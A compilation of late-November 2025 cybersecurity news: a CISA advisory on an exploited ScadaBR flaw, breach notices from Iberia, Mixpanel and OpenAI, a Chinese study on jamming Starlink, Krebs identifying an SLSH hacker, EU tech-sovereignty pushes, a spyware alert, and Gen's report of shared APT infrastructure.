cybersecuritynews.com
By Guru Baran - November 29, 2025

CISA has officially updated its Known Exploited Vulnerabilities (KEV) catalog to include a critical flaw affecting OpenPLC ScadaBR, confirming that threat actors are actively weaponizing the vulnerability in the wild.

The security defect, identified as CVE-2021-26829, is a Cross-Site Scripting (XSS) vulnerability rooted in the system_settings.shtm component of ScadaBR. While the vulnerability was first disclosed several years ago, its addition to the KEV catalog on November 28, 2025, signals a concerning resurgence in exploitation activity targeting industrial control environments.

The vulnerability allows a remote attacker to inject arbitrary web script or HTML via the system settings interface. When an administrator or an authenticated user navigates to the compromised page, the malicious script executes within their browser session.

Categorized under CWE-79 (Improper Neutralization of Input During Web Page Generation), this flaw poses significant risks to Operational Technology (OT) networks.

Successful exploitation could allow attackers to hijack user sessions, steal credentials, or modify critical configuration settings within the SCADA system. Given that OpenPLC is widely used for industrial automation research and implementation, the attack surface is notable.

CISA indicated that this vulnerability could impact open-source components, third-party libraries, or proprietary implementations used by various products, making it challenging to fully define the scope of the threat.

Under Binding Operational Directive (BOD) 22-01, CISA has established a strict remediation timeline for Federal Civilian Executive Branch (FCEB) agencies. These agencies are required to secure their networks against CVE-2021-26829 by December 19, 2025.

While CISA has not currently linked this specific exploit to known ransomware campaigns, the agency warns that unpatched SCADA systems remain high-value targets for sophisticated threat actors.

Mitigations
Security teams and network administrators are urged to prioritize the following actions:

Apply Mitigations: Implement vendor-supplied patches or configuration changes immediately.
Review Third-Party Usage: Determine if the vulnerable ScadaBR component is embedded in other tools within the network.
Discontinue Use: If mitigations are unavailable or cannot be applied, CISA advises discontinuing the use of the product to prevent compromise.
Organizations are encouraged to review the GitHub pull request for the fix (Scada-LTS/Scada-LTS) for code-level details.

securityweek.com
ByIonut Arghire| November 24, 2025 (7:14 AM ET)

Spanish flag carrier Iberia is notifying customers that their personal information was compromised after one of its suppliers was hacked.

In Spanish-written emails sent on Sunday, a copy of which threat intelligence provider Hackmanac shared on social media, the company said that names, email addresses, and frequent flyer numbers were stolen in the attack.

According to Iberia, no passwords or full credit card data was compromised in the attack, and the incident was addressed immediately after discovery.

The airline said it also improved customer account protections by requiring a verification code to be provided when attempting to change the email address associated with the account.

Iberia said it has notified law enforcement of the incident and that it has been investigating it together with its suppliers.

The company did not say when the data breach occurred and did not name the third-party supplier that was compromised. It is unclear if the incident is linked to recently disclosed hacking campaigns involving Salesforce and Oracle EBS customers.

It should also be noted that Iberia sent out notifications roughly one week after a threat actor boasted on a hacking forum about having stolen roughly 77 gigabytes of data from the airline’s systems.

The hacker claimed to have stolen ISO 27001 and ITAR-classified information, technical aircraft documentation, engine data, and various other internal documents.

Asking $150,000 for the data, the threat actor was marketing it as suitable for corporate espionage, extortion, or resale to governments.

Founded in 1927, Iberia merged with British Airways in 2011, forming International Airlines Group (IAG), which also owns Aer Lingus, BMI, and Vueling. Iberia currently has an all-Airbus fleet, operating on routes to 130 destinations worldwide.

interestingengineering.com
By Bojan Stojkovski
Nov 23, 2025 02:26 PM EST

A new simulation by Chinese defense researchers suggests that jamming Starlink coverage over an area the size of Taiwan is technically possible.

Instead of focusing on whether Starlink can be jammed in theory, Chinese military planners are increasingly concerned with how such a feat could be attempted in a real conflict over Taiwan. The challenge is staggering: Taiwan and its allies could rely on a constellation of more than 10,000 satellites that hop frequencies, reroute traffic and resist interference in real time.

However, a recent simulation study by Chinese researchers delivers the most detailed public attempt yet to model a potential countermeasure.

Published on November 5 in the peer-reviewed journal Systems Engineering and Electronics, the paper concludes that disrupting Starlink across an area comparable to Taiwan is technically achievable – but only with a massive electronic warfare (EW) force.

Dynamic Starlink network poses major hurdle for EW
Rather than treating Starlink as a static system, Chinese researchers emphasize that its constantly shifting geometry is the real obstacle. In their peer-reviewed study, the team from Zhejiang University and the Beijing Institute of Technology notes that the constellation’s orbital planes are continuously changing, with satellites moving in and out of view at all times.

This dynamic behavior creates extreme uncertainty for any military attempting to monitor, track or interfere with Starlink’s downlink signals, the South China Morning Post reports. Unlike older satellite networks that depend on a few big geostationary satellites parked over the equator, Starlink behaves nothing like a fixed target.

Traditional systems can be jammed by simply overpowering the signal from the ground, but Starlink changes the equation. Its satellites are low-orbit, fast-moving and deployed by the thousands. A single user terminal never stays linked to just one satellite – it rapidly switches between several, forming a constantly shifting mesh in the sky. As the researchers explain, even if one link is successfully jammed, the connection simply jumps to another within seconds, making interference far harder to sustain.

Distributed jamming swarms seen as the sole viable method
Yang’s research team explains that the only realistic countermeasure would be a fully distributed jamming strategy. Instead of using a few powerful ground stations, an attacker would need hundreds – or even thousands – of small, synchronized jammers deployed in the air on drones, balloons or aircraft. Together, these platforms would form a wide electromagnetic barrier over the combat zone.

The simulation tested realistic jamming by having each airborne jammer broadcast noise at different power levels. Researchers compared wide‑beam antennas that cover more area with less energy to narrow‑beam antennas that are stronger but require precise aiming. For every point on the ground, the model calculated whether a Starlink terminal could still maintain a usable signal.

The Chinese researchers calculated that fully suppressing Starlink over Taiwan, roughly 13,900 square miles, would require at least 935 synchronized jamming platforms, not including backups for failures, terrain interference, or future Starlink upgrades. Using cheaper 23 dBW power sources with spacing of about 3 miles would push the requirement to around 2,000 airborne units, though the team stressed the results remain preliminary since key Starlink anti‑jamming details are still confidential.

privatim
privatim.ch
lundi, 24 novembre 2025

Les logiciels basés sur le cloud n’ont jamais été aussi attractifs. Les infrastructures potentiellement accessibles à tous les utilisateurs d’Internet (appelées « clouds publics ») permettent une allocation dynamique des capacités de calcul et de stockage en fonction des besoins des clients. Cet effet d’échelle est d’autant plus important que l’infrastructure du fournisseur de cloud est étendue – et généralement internationale (par exemple les « hyperscalers » comme Microsoft, Google ou Amazon).
Outre les particuliers et les entreprises privées, de plus en plus d’organes publics font recours à des applications « Software-as-a-Service » (SaaS) de ces fournisseurs. On observe également que les fournisseurs cherchent de plus en plus à pousser leurs clients vers le cloud.

Cependant, les organes publics ont une responsabilité particulière vis-à-vis des données de leurs citoyens. Ils peuvent certes externaliser le traitement de ces données, mais ils doivent s’assurer que la protection des données et la sécurité des informations soient respectées. Avant d’externaliser des données personnelles vers des services de cloud computing, les autorités doivent donc analyser les risques particuliers dans chaque cas, indépendamment de la sensibilité des données, et les réduire à un niveau acceptable par des mesures appropriées (voir l’aide-mémoire cloud de privatim).

Pour les raisons suivantes, privatim considère que l’externalisation par les organes publics de données personnelles sensibles ou soumises à une obligation légale de garder le secret dans des solutions SaaS de grands fournisseurs internationaux n’est pas admissible dans la plupart des cas (comme notamment M365) :

La plupart des solutions SaaS n’offre pas encore de véritable chiffrement de bout en bout, ce qui empêcherait le fournisseur d’accéder aux données en clair.
Les entreprises opérant à l’échelle mondiale offrent trop peu de transparence pour que les autorités suisses puissent vérifier le respect des obligations contractuelles en matière de protection et de sécurité des données. Cela vaut aussi bien pour la mise en oeuvre de mesures techniques et la gestion des changements et des versions que pour l’engagement et le contrôle des collaborateurs et des sous-traitants, qui forment parfois de longues chaînes de fournisseurs de services externes. En outre, les fournisseurs de logiciels peuvent adapter périodiquement et unilatéralement les conditions contractuelles.
L’utilisation d’applications SaaS s’accompagne donc d’une perte de contrôle considérable. L’organe public ne peut pas influencer la probabilité d’une atteinte aux droits fondamentaux. Il peut uniquement réduire la gravité des violations potentielles en ne divulguant pas les données sensibles hors de son domaine de contrôle.
En ce qui concerne les données soumises à une obligation légale de garder le secret, il existe parfois une grande insécurité juridique quant à la mesure dans laquelle elles peuvent être transférées vers des services de cloud computing. Il n’est pas possible de faire appel à tout tiers en tant qu’auxiliaire, seulement parce que les dispositions du droit pénal relatives au secret professionnel et au secret de fonction obligent également les auxiliaires des détenteurs de secrets à garder le silence.
Les fournisseurs américains peuvent être contraints, en vertu de l’acte législatif CLOUD Act adopté en 2018, à fournir des données de leurs clients aux autorités américaines sans respecter les règles de l’entraide judiciaire internationale, même si ces données sont stockées dans des centres de données suisses.

Conclusion : l’utilisation de solutions SaaS internationales pour des données personnelles sensibles ou soumises à une obligation légale de garder le secret par des organes publics est possible uniquement si les données sont cryptées par l’organe responsable lui-même et que le fournisseur de services de cloud computing n’a pas accès à la clé.

mixpanel.com
sms-security-incident

Out of transparency and our desire to share with our community, this blog post contains key information about a recent security incident that impacted a limited number of our customers. On November 8th, 2025, Mixpanel detected a smishing campaign and promptly executed our incident response processes. We took comprehensive steps to contain and eradicate unauthorized access and secure impacted user accounts. We engaged external cybersecurity partners to remediate and respond to the incident.

We proactively communicated with all impacted customers. If you have not heard from us directly, you were not impacted. We continue to prioritize security as a core tenant of our company, products and services. We are committed to supporting our customers and communicating transparently about this incident.

What we did in response

• Secured affected accounts
• Revoked all active sessions and sign-ins
• Rotated compromised Mixpanel credentials for impacted accounts
• Blocked malicious IP addresses
• Registered IOCs in our SIEM platform
• Performed global password resets for all Mixpanel employees
• Engaged third-party forensics firm to advise on containment and eradication measures
• Performed a forensic review of authentication, session, and export logs across impacted accounts
• Implemented additional controls to detect and block similar activity going forward.
• Engaged with law enforcement and external cybersecurity advisors
  What you should know
  If you received a communication from us, please review it for the steps we have taken to secure your account, as well as next steps.
  If you did not receive a communication from us, no action is required. Your accounts were not impacted.

| OpenAI
openai.com/index/mixpanel-incident
November 26, 2025

OpenAI shares details about a Mixpanel security incident involving limited API analytics data. No API content, credentials, or payment details were exposed. Learn what happened and how we’re protecting users.

Transparency is important to us, so we want to inform you about a recent security incident at Mixpanel, a data analytics provider OpenAI used for web analytics on the frontend interface for our API product (platform.openai.com⁠(opens in a new window)).

The incident occurred within Mixpanel’s systems and involved limited analytics data related to some users of the API. Users of ChatGPT and other products were not impacted.

This was not a breach of OpenAI’s systems. No chat, API requests, API usage data, passwords, credentials, API keys, payment details, or government IDs were compromised or exposed.

What happened

On November 9, 2025, Mixpanel became aware of an attacker that gained unauthorized access to part of their systems and exported a dataset containing limited customer identifiable information and analytics information. Mixpanel notified OpenAI that they were investigating, and on November 25, 2025, they shared the affected dataset with us.

What this means for impacted users

User profile information associated with the use of platform.openai.com⁠(opens in a new window) may have been included in data exported from Mixpanel. The information that may have been affected was limited to:

Name that was provided to us on the API account
Email address associated with the API account
Approximate coarse location based on API user browser (city, state, country)
Operating system and browser used to access the API account
Referring websites
Organization or User IDs associated with the API account
Our response

As part of our security investigation, we removed Mixpanel from our production services, reviewed the affected datasets, and are working closely with Mixpanel and other partners to fully understand the incident and its scope. We are in the process of notifying impacted organizations, admins, and users directly. While we have found no evidence of any effect on systems or data outside Mixpanel’s environment, we continue to monitor closely for any signs of misuse.

Trust, security, and privacy are foundational to our products, our organization, and our mission. We are committed to transparency, and are notifying all impacted customers and users. We also hold our partners and vendors accountable for the highest bar for security and privacy of their services. After reviewing this incident, OpenAI has terminated its use of Mixpanel.

Beyond Mixpanel, we are conducting additional and expanded security reviews across our vendor ecosystem and are elevating security requirements for all partners and vendors.

What you should keep in mind

The information that may have been affected here could be used as part of phishing or social engineering attacks against you or your organization.

Since names, email addresses, and OpenAI API metadata (e.g., user IDs) were included, we encourage you to remain vigilant for credible-looking phishing attempts or spam. As a reminder:

Treat unexpected emails or messages with caution, especially if they include links or attachments.
Double-check that any message claiming to be from OpenAI is sent from an official OpenAI domain.
OpenAI does not request passwords, API keys, or verification codes through email, text, or chat.
Further protect your account by enabling multi-factor authentication⁠(opens in a new window).
The security and privacy of our products are paramount, and we remain resolute in protecting your information and communicating transparently when issues arise. Thank you for your continued trust in us.

OpenAI

FAQ

Why did OpenAI use Mixpanel?

Mixpanel was used as a third-party web analytics provider to help us understand product usage and improve our services for our API product (platform.openai.com)
Was this caused by a vulnerability in OpenAI’s systems?

No. This incident was limited to Mixpanel’s systems and did not involve unauthorized access to OpenAI’s infrastructure.
How do I know if my organization or I were impacted?

We are in the process of notifying those impacted now, and we will reach out to you, or your organization admin, directly via email to inform you.
Was any of my API data, prompts, or outputs affected?

No. Chat content, prompts, responses, or API usage data were not impacted.
Were ChatGPT accounts affected by this?

No. Users of ChatGPT and other products were not impacted.
Were OpenAI passwords, API keys, or payment information exposed?

No. OpenAI passwords, API keys, payment information, government IDs, and account access credentials were not impacted. Additionally, we have confirmed that session tokens, authentication tokens, and other sensitive parameters for OpenAI services were not impacted.
Do I need to reset my password or rotate my API keys?

Because passwords and API keys were not affected, we are not recommending resets or key rotation in response to this incident.
What are you doing to protect my personal information and privacy?

We have obtained the impacted datasets for independent review and are continuing to investigate potential impact, and monitor closely for any signs of misuse. We are notifying all individually impacted users and organizations and are in contact with Mixpanel on further response actions.
Has Mixpanel been removed from OpenAI products?

Yes.
Should I enable multi-factor authentication for my account?

Yes. While account credentials or tokens were not impacted in this incident, as a best practice security control, we recommend all users enable multi-factor authentication to further protect their accounts. For enterprises and organizations, we recommend that MFA is enabled at the single sign-on layer.
Will I receive further updates if something changes?

We’re committed to transparency and will keep you informed if we identify new information that materially affects impacted users. We will also update this FAQ.
Is there someone I can reach out to if I have questions?

If you have questions, concerns, or security issues, you can reach our support team at mixpanelincident@openai.com⁠.

– Krebs on Security
krebsonsecurity.com
November 26, 2025

A prolific cybercriminal group that calls itself “Scattered LAPSUS$ Hunters” has dominated headlines this year by regularly stealing data from and publicly mass extorting dozens of major corporations. But the tables seem to have turned somewhat for “Rey,” the moniker chosen by the technical operator and public face of the hacker group: Earlier this week, Rey confirmed his real life identity and agreed to an interview after KrebsOnSecurity tracked him down and contacted his father.

Scattered LAPSUS$ Hunters (SLSH) is thought to be an amalgamation of three hacking groups — Scattered Spider, LAPSUS$ and ShinyHunters. Members of these gangs hail from many of the same chat channels on the Com, a mostly English-language cybercriminal community that operates across an ocean of Telegram and Discord servers.

In May 2025, SLSH members launched a social engineering campaign that used voice phishing to trick targets into connecting a malicious app to their organization’s Salesforce portal. The group later launched a data leak portal that threatened to publish the internal data of three dozen companies that allegedly had Salesforce data stolen, including Toyota, FedEx, Disney/Hulu, and UPS.

Last week, the SLSH Telegram channel featured an offer to recruit and reward “insiders,” employees at large companies who agree to share internal access to their employer’s network for a share of whatever ransom payment is ultimately paid by the victim company.

SLSH has solicited insider access previously, but their latest call for disgruntled employees started making the rounds on social media at the same time news broke that the cybersecurity firm Crowdstrike had fired an employee for allegedly sharing screenshots of internal systems with the hacker group (Crowdstrike said their systems were never compromised and that it has turned the matter over to law enforcement agencies).

Members of SLSH have traditionally used other ransomware gangs’ encryptors in attacks, including malware from ransomware affiliate programs like ALPHV/BlackCat, Qilin, RansomHub, and DragonForce. But last week, SLSH announced on its Telegram channel the release of their own ransomware-as-a-service operation called ShinySp1d3r.

The individual responsible for releasing the ShinySp1d3r ransomware offering is a core SLSH member who goes by the handle “Rey” and who is currently one of just three administrators of the SLSH Telegram channel. Previously, Rey was an administrator of the data leak website for Hellcat, a ransomware group that surfaced in late 2024 and was involved in attacks on companies including Schneider Electric, Telefonica, and Orange Romania.

Also in 2024, Rey would take over as administrator of the most recent incarnation of BreachForums, an English-language cybercrime forum whose domain names have been seized on multiple occasions by the FBI and/or by international authorities. In April 2025, Rey posted on Twitter/X about another FBI seizure of BreachForums.

On October 5, 2025, the FBI announced it had once again seized the domains associated with BreachForums, which it described as a major criminal marketplace used by ShinyHunters and others to traffic in stolen data and facilitate extortion.

“This takedown removes access to a key hub used by these actors to monetize intrusions, recruit collaborators, and target victims across multiple sectors,” the FBI said.

Incredibly, Rey would make a series of critical operational security mistakes last year that provided multiple avenues to ascertain and confirm his real-life identity and location. Read on to learn how it all unraveled for Rey.

WHO IS REY?
According to the cyber intelligence firm Intel 471, Rey was an active user on various BreachForums reincarnations over the past two years, authoring more than 200 posts between February 2024 and July 2025. Intel 471 says Rey previously used the handle “Hikki-Chan” on BreachForums, where their first post shared data allegedly stolen from the U.S. Centers for Disease Control and Prevention (CDC).

In that February 2024 post about the CDC, Hikki-Chan says they could be reached at the Telegram username @wristmug. In May 2024, @wristmug posted in a Telegram group chat called “Pantifan” a copy of an extortion email they said they received that included their email address and password.

The message that @wristmug cut and pasted appears to have been part of an automated email scam that claims it was sent by a hacker who has compromised your computer and used your webcam to record a video of you while you were watching porn. These missives threaten to release the video to all your contacts unless you pay a Bitcoin ransom, and they typically reference a real password the recipient has used previously.

“Noooooo,” the @wristmug account wrote in mock horror after posting a screenshot of the scam message. “I must be done guys.”

In posting their screenshot, @wristmug redacted the username portion of the email address referenced in the body of the scam message. However, they did not redact their previously-used password, and they left the domain portion of their email address (@proton.me) visible in the screenshot.

O5TDEV
Searching on @wristmug’s rather unique 15-character password in the breach tracking service Spycloud finds it is known to have been used by just one email address: cybero5tdev@proton.me. According to Spycloud, those credentials were exposed at least twice in early 2024 when this user’s device was infected with an infostealer trojan that siphoned all of its stored usernames, passwords and authentication cookies.

Intel 471 shows the email address cybero5tdev@proton.me belonged to a BreachForums member who went by the username o5tdev. Searching on this nickname in Google brings up at least two website defacement archives showing that a user named o5tdev was previously involved in defacing sites with pro-Palestinian messages. The screenshot below, for example, shows that 05tdev was part of a group called Cyb3r Drag0nz Team.

A 2023 report from SentinelOne described Cyb3r Drag0nz Team as a hacktivist group with a history of launching DDoS attacks and cyber defacements as well as engaging in data leak activity.

“Cyb3r Drag0nz Team claims to have leaked data on over a million of Israeli citizens spread across multiple leaks,” SentinelOne reported. “To date, the group has released multiple .RAR archives of purported personal information on citizens across Israel.”

The cyber intelligence firm Flashpoint finds the Telegram user @05tdev was active in 2023 and early 2024, posting in Arabic on anti-Israel channels like “Ghost of Palestine” [full disclosure: Flashpoint is currently an advertiser on this blog].

‘I’M A GINTY’
Flashpoint shows that Rey’s Telegram account (ID7047194296) was particularly active in a cybercrime-focused channel called Jacuzzi, where this user shared several personal details, including that their father was an airline pilot. Rey claimed in 2024 to be 15 years old, and to have family connections to Ireland.

Specifically, Rey mentioned in several Telegram chats that he had Irish heritage, even posting a graphic that shows the prevalence of the surname “Ginty.”

Spycloud indexed hundreds of credentials stolen from cybero5dev@proton.me, and those details indicate that Rey’s computer is a shared Microsoft Windows device located in Amman, Jordan. The credential data stolen from Rey in early 2024 show there are multiple users of the infected PC, but that all shared the same last name of Khader and an address in Amman, Jordan.

The “autofill” data lifted from Rey’s family PC contains an entry for a 46-year-old Zaid Khader that says his mother’s maiden name was Ginty. The infostealer data also shows Zaid Khader frequently accessed internal websites for employees of Royal Jordanian Airlines.

MEET SAIF
The infostealer data makes clear that Rey’s full name is Saif Al-Din Khader. Having no luck contacting Saif directly, KrebsOnSecurity sent an email to his father Zaid. The message invited the father to respond via email, phone or Signal, explaining that his son appeared to be deeply enmeshed in a serious cybercrime conspiracy.

Less than two hours later, I received a Signal message from Saif, who said his dad suspected the email was a scam and had forwarded it to him.

“I saw your email, unfortunately I don’t think my dad would respond to this because they think its some ‘scam email,'” said Saif, who told me he turns 16 years old next month. “So I decided to talk to you directly.”

Saif explained that he’d already heard from European law enforcement officials, and had been trying to extricate himself from SLSH. When asked why then he was involved in releasing SLSH’s new ShinySp1d3r ransomware-as-a-service offering, Saif said he couldn’t just suddenly quit the group.

“Well I cant just dip like that, I’m trying to clean up everything I’m associated with and move on,” he said.

He also shared that ShinySp1d3r is just a rehash of Hellcat ransomware, except modified with AI tools. “I gave the source code of Hellcat ransomware out basically.”

Saif claims he reached out on his own recently to the Telegram account for Operation Endgame, the codename for an ongoing law enforcement operation targeting cybercrime services, vendors and their customers.

“I’m already cooperating with law enforcement,” Saif said. “In fact, I have been talking to them since at least June. I have told them nearly everything. I haven’t really done anything like breaching into a corp or extortion related since September.”

Saif suggested that a story about him right now could endanger any further cooperation he may be able to provide. He also said he wasn’t sure if the U.S. or European authorities had been in contact with the Jordanian government about his involvement with the hacking group.

“A story would bring so much unwanted heat and would make things very difficult if I’m going to cooperate,” Saif said. “I’m unsure whats going to happen they said they’re in contact with multiple countries regarding my request but its been like an entire week and I got no updates from them.”

Saif shared a screenshot that indicated he’d contacted Europol authorities late last month. But he couldn’t name any law enforcement officials he said were responding to his inquiries, and KrebsOnSecurity was unable to verify his claims.

“I don’t really care I just want to move on from all this stuff even if its going to be prison time or whatever they gonna say,” Saif said.

politico.eu
November 24, 2025 9:12 pm CET
By Mathieu Pollet

“We cannot afford this level of dependence on foreign tech,” lawmakers say in letter obtained by POLITICO.

BRUSSELS — A cross-party group of lawmakers will urge the European Parliament to ditch internal use of Microsoft’s ubiquitous software in favor of a European alternative, according to a letter obtained by POLITICO.

The call comes amid fresh concerns that the dominance of a handful of U.S. tech giants has become too much of a liability for Europe’s security and prosperity, and as the U.S. administration renewed demands for digital concessions at a meeting in Brussels on Monday.

In the scathing letter to be delivered to Parliament President Roberta Metsola on Tuesday, 38 lawmakers also list the screens, keyboards and mouses from Dell, HP and LG — in use across the chamber’s IT systems — as technology that should be ditched.

“With its thousands of employees and vast resources, the European Parliament is best positioned to galvanise the push for tech sovereignty,” the letter reads. “When even old friends can turn into foes and their companies into a political tool, we cannot afford this level of dependence on foreign tech, let alone continue funneling billions of taxpayers' money abroad.”

The lawmakers cite a broad range of European alternatives they argue are viable solutions: from Norwegian internet browser Vivaldi, French search engine Qwant and Swiss secure email suite Proton to German collaboration platform Nextcloud.

“Our mid-term goal should be the complete phase-out of Microsoft products, including the Windows operating system. It’s easier than it sounds,” the lawmakers say, praising the International Criminal Court’s recent move to drop Microsoft over U.S. sanction fears.

The letter is signed by influential members including MEPs Aura Salla and Mika Aaltola from the center-right EPP; Birgit Sippel and Raphaël Glucksmann from the center-left S&D; Stéphanie Yon-Courtin and Marie-Agnes Strack-Zimmermann from the centrist Renew Europe group; Alexandra Geese and Kim van Sparrentak from the Greens; and Leïla Chaibi and Merja Kyllönen from The Left.

“The Parliament's vehicle fleet is almost entirely made up of cars from European brands. The same can be replicated for end-product computer hardware,” they argue. They call to set up a task group of lawmakers and Parliament staffers to help and monitor that transition.

“With enough political will, we will have freed this institution from the danger of foreign tech dependency by the end of the mandate,” they write.

Last week saw Germany swing behind a long-standing push from France to make Europe more reliant on its own technology companies and chart its digital independence from the U.S., at a political summit in Berlin.

Austrian centrist lawmaker Helmut Brandstätter, who coordinated the initiative, said in a statement: “Right now, the European Parliament runs on foreign software that can be switched off, monitored, or politically weaponised overnight. That is not just inconvenient, it is a strategic vulnerability," adding this isn't “anti-American” but “pro European sovereignty.”

“Microsoft is proud to offer the broadest set of sovereignty solutions on the market today,” Robin Koch, a spokesperson for the company, said in a statement. “We will continue to look for new ways to ensure the European Parliament and our other European customers have the options and assurances they need to operate with confidence.”

cisa.gov Alert
Release DateNovember 24, 2025

CISA is aware of multiple cyber threat actors actively leveraging commercial spyware to target users of mobile messaging applications (apps).1 These cyber actors use sophisticated targeting and social engineering techniques to deliver spyware and gain unauthorized access to a victim’s messaging app, facilitating the deployment of additional malicious payloads that can further compromise the victim’s mobile device.

These cyber actors use tactics such as:

• Phishing and malicious device-linking QR codes to compromise victim accounts and link them to actor-controlled devices.
• Zero-click exploits,2 which require no direct action from the device user.
• Impersonation3 of messaging app platforms, such as Signal and WhatsApp.
  While current targeting remains opportunistic, evidence suggests these cyber actors focus on high-value individuals, such as current and former high-ranking government, military, and political officials,4 as well as civil society organizations (CSOs) and individuals across the United States,5 Middle East,6 and Europe.7

CISA strongly encourages messaging app users to review the updated Mobile Communications Best Practice Guidance and Mitigating Cyber Threats with Limited Resources: Guidance for Civil Society for steps to protect mobile communications and messaging apps, as well as mitigations against spyware.

Gen Blogs | gendigital.com
Threat Research Team
November 19, 2025

State-sponsored hacking groups typically operate in isolation, each advancing its own nation’s goals. That’s why any sign of collaboration between them is cause for concern. Yet new evidence uncovered by Gen researchers suggests that two of the world’s most aggressive advanced persistent threat (APT) actors, Russia-aligned Gamaredon and North Korea’s Lazarus, may be operating on shared infrastructure.

This discovery hints at something much bigger than mere technical overlap. It points to a possible new stage in cyber conflict, where geopolitical alliances are mirrored in shared digital operations.

From allies on the battlefield to partners online
Russia and North Korea have maintained a long-standing partnership rooted in shared political and military interests. Moscow backed Pyongyang during and after the Korean War, and in 2024 both nations renewed that alliance through a Comprehensive Strategic Partnership that includes mutual defense commitments.

Since 2022, Pyongyang has stepped up its support for Moscow, formally recognizing Russian-claimed territories in Ukraine and reportedly supplying munitions and troops. In 2024, Reuters reported that North Korean soldiers had been deployed to fight alongside Russian forces in Ukraine, a striking example of the two countries’ deepening cooperation.

Now, we may be witnessing a digital extension of that alliance. On July 28, 2025, Gen’s internal monitoring systems detected a suspicious event linking Gamaredon and Lazarus activity through a shared IP address. The implications are significant: two state-backed actors from different countries may be coordinating at an operational level.

This development aligns with broader patterns highlighted in the Q3/2025 Threat Report, where state sponsored operations showed increasing sophistication, coordination, and diversification of infrastructure. While those observations were confined within national ecosystems, the Gamaredon–Lazarus overlap suggests that similar dynamics may now be emerging across national boundaries.

Background
Gamaredon
Gamaredon is a Russian-aligned APT active since at least 2013, primarily focused on cyber espionage. In 2021, the Security Service of Ukraine issued a press release, attributing several members of the group as part of Russia's Federal Security Service (FSB) 18th Information Security Center. Since its official inception, the group is believed to have conducted more than 5000 cyber-attacks, most of which targeted Ukrainian government agencies. However, with the onset of war in Ukraine, ESET reported that Gamaredon expanded its operations to include NATO member states, likely aiming to disrupt military aid to Ukraine, underscoring the group’s prioritization of hybrid warfare.

Lazarus
Lazarus is a state-sponsored threat actor active since 2009 and widely believed to operate under North Korea’s government. Initially focused on cyber espionage and destructive attacks, Lazarus later shifted toward financially motivated operations to fund future campaigns. In 2021, the United States Department of Justice indicted three members believed to be part of the Lazarus group, connecting them to North Korea’s Reconnaissance General Bureau (RGB), the country’s primary intelligence agency. With the rise of cryptocurrency, Lazarus increasingly targeted digital assets, as evidenced by high-profile breaches such as Stake.com ($41 million), AtomicWallet ($100 million), WazirX ($235 million), and Bybit ($1.4 billion).

Where Gamaredon spies, Lazarus steals, but both ultimately serve their governments’ strategic interests.

The discovery: a shared digital footprint
Just one day after the announcement of new direct flights between Moscow and Pyongyang, Gen identified indicators of a potential collaboration between the Gamaredon and Lazarus APTs. On July 24, 2025, our system tracking Gamaredon’s Command-and-Control (C2) servers via known Telegram and Telegraph channels blocked an IP address:

144[.]172[.]112[.]106

Four days later, during a routine check, the same server was found hosting an obfuscated version of InvisibleFerret (SHA256: 128da948f7c3a6c052e782acfee503383bf05d953f3db5c603e4d386e2cf4b4d), a malware strain attributed to Lazarus. The payload matched Lazarus’ tooling and was delivered through an identical server structure (URL: http[://]144[.]172[.]112[.]106/payload/99/81) previously seen in ContagiousInterview, a Lazarus campaign that targeted job seekers with fake recruitment messages. While the IP could represent a proxy or VPN endpoint, the temporal proximity of both groups’ activity and the shared hosting pattern indicate probable infrastructure reuse, with moderate confidence of operational collaboration. Whether Lazarus leveraged a Gamaredon-controlled server or both actors shared the same client instance remains unclear, but the overlap is too close to ignore.

Implications for the global threat landscape
Cross-country collaborations in the APT ecosystem remain exceptionally rare. The last widely acknowledged example dates back to 2014 with the Regin malware, reportedly co-developed by the U.S. National Security Agency (NSA) and the U.K.’s Government Communications Headquarters (GCHQ).

If confirmed, the Gamaredon–Lazarus overlap would represent the first known case of Russian–North Korean cyber collaboration in the wild.

Such a partnership could have wide-ranging implications:

Operational synergy: Lazarus’s expertise in monetizing cyberattacks through cryptocurrency theft could help Gamaredon fund or conceal future operations.
Strategic alignment: Russia, facing mounting economic and military pressure, could benefit from North Korea’s established infrastructure for covert financial operations.
Escalation potential: This kind of collaboration blurs the line between espionage, sabotage, and organized cybercrime, expanding both nations’ offensive reach.
Not an isolated case: national ecosystems are merging
While cross-border APT collaboration is rare, cooperation within national ecosystems has become increasingly common.

Lazarus x Kimsuky
Kimsuky is another North Korean APT group. It has been active since around 2012 and assessed by Mandiant to operate under the RGB. The group specializes in advanced cyber-espionage campaigns, primarily targeting government entities and consumer-facing organizations.

During analysis of Lazarus’ ContagiousInterview payloads, Gen researchers found that an IP address (216[.]219[.]87[.]41) later reappeared in Kimsuky-linked payloads (e.g., cce27340fd6f32d96c65b7b1034c65d5026d7d0b96c80bcf31e40ab4b8834bcd). This suggests infrastructure reuse or coordination between RGB units, evidence of alignment at North Korea’s national level.

DoNot x SideWinder
DoNot and SideWinder are state-sponsored APT groups believed to have been active since 2013 and 2012, respectively, both with ties to the Indian government and a primary focus on cyber espionage.

Gen identified a DoNot-attributed payload (8bb089d763d5d4b4f96ae59eb9d8f919e6a49611c183f636bfd5c01696447938) that later executed a known SideWinder loader (f4d10604980f8f556440460adc71883f04e24231d0a9a3a323a86651405bedfb). The victim was located in Pakistan, consistent with the typical targeting profile of both groups. This cooperation resembles the previously observed Gamaredon x Turla collaboration, indicating that intra-country partnerships are becoming a tactical norm.

A new phase in cyber geopolitics
The evidence of infrastructure overlap between Lazarus and Gamaredon represents a significant development in the global threat landscape. Historically, cross-country APT collaborations have been exceedingly rare, with only a handful of confirmed cases such as Stuxnet and Regin. This potential partnership signals a shift toward more complex and unpredictable alliances, where geopolitical interests may drive operational convergence.

While the Lazarus–Gamaredon case stands out for its strategic implications, the observed intranational collaborations, such as Lazarus with Kimsuky and DoNot with SideWinder, are equally important. These partnerships demonstrate a growing trend of resource sharing and tactical alignment within national ecosystems, amplifying the reach and resilience of state-sponsored campaigns.

For defenders, these findings underscore an urgent need to adapt detection strategies beyond single-actor attribution. Shared infrastructure, overlapping TTPs, and modular malware frameworks mean that traditional attribution models may fail to capture the full scope of risk. Security teams must:

Enhance infrastructure correlation analysis to detect cross-group overlaps early.
Prioritize intelligence sharing across organizations and sectors to identify emerging alliances.
Implement layered defenses capable of mitigating diverse tactics from multiple threat actors leveraging common resources.
The era of isolated APT operations is fading. As adversaries evolve through collaboration, defenders must respond with equal agility and cooperation to safeguard critical assets.

Ars Technica - arstechnica.com
Dan Goodin Senior Security Editor
19 nov. 2025 21:25

Integration of Copilot Actions into Windows is off by default, but for how long?

